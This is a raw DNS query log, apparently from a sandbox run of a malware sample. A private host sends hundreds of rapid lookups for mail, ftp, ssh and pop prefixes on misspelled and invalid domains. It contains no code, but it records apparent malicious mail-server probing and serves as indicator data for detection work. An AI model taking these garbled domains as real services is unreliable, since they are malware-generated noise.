Nov 30, 2023 11:22:39.203723907 CET	192.168.2.4	1.1.1.1	0xb56b	Standard query (0)	ssh.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.204051018 CET	192.168.2.4	1.1.1.1	0x5bf9	Standard query (0)	mail.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.204389095 CET	192.168.2.4	1.1.1.1	0xff1c	Standard query (0)	mail.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.204741955 CET	192.168.2.4	1.1.1.1	0x358d	Standard query (0)	ssh.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.206643105 CET	192.168.2.4	1.1.1.1	0x8779	Standard query (0)	relay.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.206914902 CET	192.168.2.4	1.1.1.1	0x50d5	Standard query (0)	osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.207231998 CET	192.168.2.4	1.1.1.1	0xf1e5	Standard query (0)	23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.208163023 CET	192.168.2.4	1.1.1.1	0x57fa	Standard query (0)	mail.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.208455086 CET	192.168.2.4	1.1.1.1	0xb088	Standard query (0)	gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.209388018 CET	192.168.2.4	1.1.1.1	0xa9cd	Standard query (0)	asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.210036039 CET	192.168.2.4	1.1.1.1	0x2edb	Standard query (0)	ftp.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.214024067 CET	192.168.2.4	1.1.1.1	0x3ed8	Standard query (0)	ftp.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.219683886 CET	192.168.2.4	1.1.1.1	0x2217	Standard query (0)	ftp.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.219752073 CET	192.168.2.4	1.1.1.1	0xe8d5	Standard query (0)	ftp.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.252768040 CET	192.168.2.4	1.1.1.1	0xab92	Standard query (0)	mail.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.255275011 CET	192.168.2.4	1.1.1.1	0x8a6d	Standard query (0)	yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.255404949 CET	192.168.2.4	1.1.1.1	0xd989	Standard query (0)	zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.255500078 CET	192.168.2.4	1.1.1.1	0xec9a	Standard query (0)	ssh.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.523385048 CET	192.168.2.4	1.1.1.1	0x3545	Standard query (0)	mail.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531295061 CET	192.168.2.4	1.1.1.1	0x2edb	Standard query (0)	ftp.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531295061 CET	192.168.2.4	1.1.1.1	0xff1c	Standard query (0)	mail.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531295061 CET	192.168.2.4	1.1.1.1	0x5bf9	Standard query (0)	mail.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531436920 CET	192.168.2.4	1.1.1.1	0x57fa	Standard query (0)	mail.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531586885 CET	192.168.2.4	1.1.1.1	0x2217	Standard query (0)	ftp.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531995058 CET	192.168.2.4	1.1.1.1	0xab92	Standard query (0)	mail.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531995058 CET	192.168.2.4	1.1.1.1	0xec9a	Standard query (0)	ssh.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531995058 CET	192.168.2.4	1.1.1.1	0xd989	Standard query (0)	zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.531995058 CET	192.168.2.4	1.1.1.1	0x8a6d	Standard query (0)	yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.536075115 CET	192.168.2.4	1.1.1.1	0xe394	Standard query (0)	comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.542473078 CET	192.168.2.4	1.1.1.1	0xe2f1	Standard query (0)	ftp.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.542473078 CET	192.168.2.4	1.1.1.1	0xc72	Standard query (0)	mail.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.543262005 CET	192.168.2.4	1.1.1.1	0xc619	Standard query (0)	mail.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.543309927 CET	192.168.2.4	1.1.1.1	0x359f	Standard query (0)	mail.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.547204018 CET	192.168.2.4	1.1.1.1	0xfefe	Standard query (0)	mail.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.547204018 CET	192.168.2.4	1.1.1.1	0x1d33	Standard query (0)	ftp.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.547836065 CET	192.168.2.4	1.1.1.1	0xb6fe	Standard query (0)	mail.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.549942017 CET	192.168.2.4	1.1.1.1	0xce9e	Standard query (0)	ftp.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.555305004 CET	192.168.2.4	1.1.1.1	0x4a76	Standard query (0)	imap.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.559418917 CET	192.168.2.4	1.1.1.1	0x843d	Standard query (0)	pop.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.563364983 CET	192.168.2.4	1.1.1.1	0xbc68	Standard query (0)	mail.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.614291906 CET	192.168.2.4	1.1.1.1	0xf113	Standard query (0)	ftp.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660614014 CET	192.168.2.4	1.1.1.1	0x4605	Standard query (0)	relay.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.671911955 CET	192.168.2.4	1.1.1.1	0x5d0e	Standard query (0)	pop3.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.675009966 CET	192.168.2.4	1.1.1.1	0x1e6d	Standard query (0)	mail.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.696513891 CET	192.168.2.4	1.1.1.1	0xf6f3	Standard query (0)	ftp.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.696513891 CET	192.168.2.4	1.1.1.1	0x32e0	Standard query (0)	ssh.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.698476076 CET	192.168.2.4	1.1.1.1	0x55a8	Standard query (0)	mail.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.703598022 CET	192.168.2.4	1.1.1.1	0x11f4	Standard query (0)	ssh.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.703598022 CET	192.168.2.4	1.1.1.1	0xda99	Standard query (0)	ftp.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.707354069 CET	192.168.2.4	1.1.1.1	0xfff1	Standard query (0)	pop.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.766784906 CET	192.168.2.4	1.1.1.1	0x168a	Standard query (0)	ftp.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.767364025 CET	192.168.2.4	1.1.1.1	0x2af6	Standard query (0)	getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.767852068 CET	192.168.2.4	1.1.1.1	0xb40a	Standard query (0)	mail.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.768949032 CET	192.168.2.4	1.1.1.1	0x9086	Standard query (0)	ssh.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.855257988 CET	192.168.2.4	1.1.1.1	0x13a0	Standard query (0)	ww42.onlist.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.875386000 CET	192.168.2.4	1.1.1.1	0x9ae	Standard query (0)	ftp.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.878443956 CET	192.168.2.4	1.1.1.1	0xb47c	Standard query (0)	www.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.878443956 CET	192.168.2.4	1.1.1.1	0x7990	Standard query (0)	ftp.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.878443956 CET	192.168.2.4	1.1.1.1	0xde36	Standard query (0)	pop.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.883322954 CET	192.168.2.4	1.1.1.1	0xf282	Standard query (0)	ftp.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.926183939 CET	192.168.2.4	1.1.1.1	0x1384	Standard query (0)	ssh.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.926183939 CET	192.168.2.4	1.1.1.1	0x1e6d	Standard query (0)	mail.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.926183939 CET	192.168.2.4	1.1.1.1	0x8072	Standard query (0)	ftp.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.927123070 CET	192.168.2.4	1.1.1.1	0xf3c3	Standard query (0)	ftp.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.927123070 CET	192.168.2.4	1.1.1.1	0x96bd	Standard query (0)	ftp.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.927123070 CET	192.168.2.4	1.1.1.1	0x6da5	Standard query (0)	ftp.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.931368113 CET	192.168.2.4	1.1.1.1	0x1fc8	Standard query (0)	mail.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.931368113 CET	192.168.2.4	1.1.1.1	0xe5b7	Standard query (0)	ftp.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.941440105 CET	192.168.2.4	1.1.1.1	0x8e35	Standard query (0)	www.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.944839954 CET	192.168.2.4	1.1.1.1	0x8f2d	Standard query (0)	mail.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.944839954 CET	192.168.2.4	1.1.1.1	0x3a3c	Standard query (0)	ssh.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.947284937 CET	192.168.2.4	1.1.1.1	0x367e	Standard query (0)	ssh.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.961265087 CET	192.168.2.4	1.1.1.1	0xb0ad	Standard query (0)	ww42.2mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.961957932 CET	192.168.2.4	1.1.1.1	0x779d	Standard query (0)	mail.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.972146034 CET	192.168.2.4	1.1.1.1	0x9f8a	Standard query (0)	mail.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.975162029 CET	192.168.2.4	1.1.1.1	0x351c	Standard query (0)	mail.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.978180885 CET	192.168.2.4	1.1.1.1	0x23b	Standard query (0)	mail.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.978180885 CET	192.168.2.4	1.1.1.1	0xd09f	Standard query (0)	ftp.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.983436108 CET	192.168.2.4	1.1.1.1	0x7945	Standard query (0)	mail.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.987291098 CET	192.168.2.4	1.1.1.1	0x7749	Standard query (0)	ftp.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.036056042 CET	192.168.2.4	1.1.1.1	0x168a	Standard query (0)	ftp.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.039257050 CET	192.168.2.4	1.1.1.1	0x3b1c	Standard query (0)	ftp.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.050324917 CET	192.168.2.4	1.1.1.1	0x41e9	Standard query (0)	ftp.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.050324917 CET	192.168.2.4	1.1.1.1	0x60a7	Standard query (0)	ssh.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.053148031 CET	192.168.2.4	1.1.1.1	0x6b7b	Standard query (0)	imap.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.055377007 CET	192.168.2.4	1.1.1.1	0x2901	Standard query (0)	hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.055377007 CET	192.168.2.4	1.1.1.1	0x10a0	Standard query (0)	mail.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.055640936 CET	192.168.2.4	1.1.1.1	0x5ae4	Standard query (0)	ftp.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.055871010 CET	192.168.2.4	1.1.1.1	0xdaa0	Standard query (0)	mail.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.056452990 CET	192.168.2.4	1.1.1.1	0x3365	Standard query (0)	ftp.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.057126045 CET	192.168.2.4	1.1.1.1	0x77ba	Standard query (0)	ftp.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.057209015 CET	192.168.2.4	1.1.1.1	0x1c65	Standard query (0)	ftp.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.059292078 CET	192.168.2.4	1.1.1.1	0xf8ef	Standard query (0)	ssh.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.070501089 CET	192.168.2.4	1.1.1.1	0x6c6b	Standard query (0)	ftp.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.070501089 CET	192.168.2.4	1.1.1.1	0x1049	Standard query (0)	mail.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.071470022 CET	192.168.2.4	1.1.1.1	0x7c29	Standard query (0)	mail.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.072272062 CET	192.168.2.4	1.1.1.1	0xe773	Standard query (0)	ssh.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.072272062 CET	192.168.2.4	1.1.1.1	0xb6b2	Standard query (0)	ftp.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.079288006 CET	192.168.2.4	1.1.1.1	0x5c7e	Standard query (0)	kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.079288006 CET	192.168.2.4	1.1.1.1	0xc9d	Standard query (0)	mail.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.080415010 CET	192.168.2.4	1.1.1.1	0xdcba	Standard query (0)	mail.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.081547022 CET	192.168.2.4	1.1.1.1	0xe401	Standard query (0)	pop.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.081547976 CET	192.168.2.4	1.1.1.1	0xd23f	Standard query (0)	mail.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.207329035 CET	192.168.2.4	1.1.1.1	0xb47c	Standard query (0)	www.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.207329035 CET	192.168.2.4	1.1.1.1	0xe98f	Standard query (0)	ftp.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.207473993 CET	192.168.2.4	1.1.1.1	0x8e35	Standard query (0)	www.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.208537102 CET	192.168.2.4	1.1.1.1	0x3a3c	Standard query (0)	ssh.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.208537102 CET	192.168.2.4	1.1.1.1	0xb0ad	Standard query (0)	ww42.2mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.211488008 CET	192.168.2.4	1.1.1.1	0x9037	Standard query (0)	mail.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.211513996 CET	192.168.2.4	1.1.1.1	0xc40e	Standard query (0)	mail.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.212583065 CET	192.168.2.4	1.1.1.1	0x2756	Standard query (0)	www.hugedomains.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.223936081 CET	192.168.2.4	1.1.1.1	0x3d4f	Standard query (0)	ssh.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.226744890 CET	192.168.2.4	1.1.1.1	0xa405	Standard query (0)	tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.226744890 CET	192.168.2.4	1.1.1.1	0x9143	Standard query (0)	mail.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.227415085 CET	192.168.2.4	1.1.1.1	0x8ca4	Standard query (0)	ftp.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.228542089 CET	192.168.2.4	1.1.1.1	0xd278	Standard query (0)	ftp.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.228693008 CET	192.168.2.4	1.1.1.1	0xa176	Standard query (0)	ftp.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.229554892 CET	192.168.2.4	1.1.1.1	0x66e5	Standard query (0)	mail.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.229890108 CET	192.168.2.4	1.1.1.1	0x2d8c	Standard query (0)	ftp.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.230295897 CET	192.168.2.4	1.1.1.1	0x8fcd	Standard query (0)	mail.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.232790947 CET	192.168.2.4	1.1.1.1	0xe465	Standard query (0)	ftp.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.233016014 CET	192.168.2.4	1.1.1.1	0xe1bc	Standard query (0)	ftp.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.233865023 CET	192.168.2.4	1.1.1.1	0xa5d7	Standard query (0)	mail.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.235644102 CET	192.168.2.4	1.1.1.1	0x839a	Standard query (0)	ftp.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.238643885 CET	192.168.2.4	1.1.1.1	0xfd14	Standard query (0)	comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.238643885 CET	192.168.2.4	1.1.1.1	0xbba	Standard query (0)	mail.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.238956928 CET	192.168.2.4	1.1.1.1	0xcc85	Standard query (0)	ftp.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.242007971 CET	192.168.2.4	1.1.1.1	0xb89f	Standard query (0)	phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.242105007 CET	192.168.2.4	1.1.1.1	0x1aa5	Standard query (0)	mail.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.243532896 CET	192.168.2.4	1.1.1.1	0x755f	Standard query (0)	ftp.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.243532896 CET	192.168.2.4	1.1.1.1	0x8a36	Standard query (0)	hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.273099899 CET	192.168.2.4	1.1.1.1	0x2a0b	Standard query (0)	mail.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.273309946 CET	192.168.2.4	1.1.1.1	0x2fd0	Standard query (0)	ftp.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.276809931 CET	192.168.2.4	1.1.1.1	0xee8a	Standard query (0)	t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.280385971 CET	192.168.2.4	1.1.1.1	0x746d	Standard query (0)	ftp.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.281341076 CET	192.168.2.4	1.1.1.1	0x3991	Standard query (0)	ftp.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.282017946 CET	192.168.2.4	1.1.1.1	0x6507	Standard query (0)	ftp.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.282017946 CET	192.168.2.4	1.1.1.1	0x8fc9	Standard query (0)	gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.282289982 CET	192.168.2.4	1.1.1.1	0x29dc	Standard query (0)	ftp.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.284517050 CET	192.168.2.4	1.1.1.1	0xcb9c	Standard query (0)	mail.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.284517050 CET	192.168.2.4	1.1.1.1	0x9057	Standard query (0)	mail.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.284517050 CET	192.168.2.4	1.1.1.1	0x20d1	Standard query (0)	ftp.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.286081076 CET	192.168.2.4	1.1.1.1	0xd511	Standard query (0)	ftp.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.286081076 CET	192.168.2.4	1.1.1.1	0x7576	Standard query (0)	mail.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.286081076 CET	192.168.2.4	1.1.1.1	0x8c3b	Standard query (0)	mail.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.286583900 CET	192.168.2.4	1.1.1.1	0x2450	Standard query (0)	pop.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.291421890 CET	192.168.2.4	1.1.1.1	0xc6c5	Standard query (0)	ftp.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.292474985 CET	192.168.2.4	1.1.1.1	0xfdf7	Standard query (0)	mail.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.292474985 CET	192.168.2.4	1.1.1.1	0xbd7c	Standard query (0)	ftp.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.292474985 CET	192.168.2.4	1.1.1.1	0xa80a	Standard query (0)	ftp.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.296994925 CET	192.168.2.4	1.1.1.1	0x2659	Standard query (0)	sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.296994925 CET	192.168.2.4	1.1.1.1	0x9b39	Standard query (0)	mail.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.298547029 CET	192.168.2.4	1.1.1.1	0x82f5	Standard query (0)	pop.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.298547029 CET	192.168.2.4	1.1.1.1	0xc2c8	Standard query (0)	mail.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.298547029 CET	192.168.2.4	1.1.1.1	0x113f	Standard query (0)	ftp.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.299271107 CET	192.168.2.4	1.1.1.1	0x8452	Standard query (0)	ftp.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.300491095 CET	192.168.2.4	1.1.1.1	0xe4fd	Standard query (0)	pop.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.301500082 CET	192.168.2.4	1.1.1.1	0xa04d	Standard query (0)	mail.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.302854061 CET	192.168.2.4	1.1.1.1	0xc03f	Standard query (0)	mail.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.302854061 CET	192.168.2.4	1.1.1.1	0xd81f	Standard query (0)	mail.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.302854061 CET	192.168.2.4	1.1.1.1	0x5989	Standard query (0)	ftp.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.304114103 CET	192.168.2.4	1.1.1.1	0xae3a	Standard query (0)	ftp.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.305078030 CET	192.168.2.4	1.1.1.1	0x477e	Standard query (0)	ftp.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.305973053 CET	192.168.2.4	1.1.1.1	0x2003	Standard query (0)	mail.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.305973053 CET	192.168.2.4	1.1.1.1	0x5a3b	Standard query (0)	ssh.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.305973053 CET	192.168.2.4	1.1.1.1	0xc190	Standard query (0)	mail.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.306507111 CET	192.168.2.4	1.1.1.1	0xa5f4	Standard query (0)	mail.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.307574987 CET	192.168.2.4	1.1.1.1	0x5f40	Standard query (0)	ftp.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.309339046 CET	192.168.2.4	1.1.1.1	0x1ee0	Standard query (0)	ssh.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.309339046 CET	192.168.2.4	1.1.1.1	0x77ba	Standard query (0)	ftp.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.309339046 CET	192.168.2.4	1.1.1.1	0x4bf8	Standard query (0)	ftp.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.309698105 CET	192.168.2.4	1.1.1.1	0x5ae4	Standard query (0)	ftp.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.311636925 CET	192.168.2.4	1.1.1.1	0xe94	Standard query (0)	ssh.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.311991930 CET	192.168.2.4	1.1.1.1	0xe19d	Standard query (0)	ssh.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.311991930 CET	192.168.2.4	1.1.1.1	0x1d66	Standard query (0)	ssh.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.311991930 CET	192.168.2.4	1.1.1.1	0x8e5a	Standard query (0)	ssh.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.316966057 CET	192.168.2.4	1.1.1.1	0x914b	Standard query (0)	mail.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.319284916 CET	192.168.2.4	1.1.1.1	0xfba5	Standard query (0)	mailgate.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.321944952 CET	192.168.2.4	1.1.1.1	0x9df5	Standard query (0)	mail.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.321944952 CET	192.168.2.4	1.1.1.1	0x39be	Standard query (0)	ftp.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
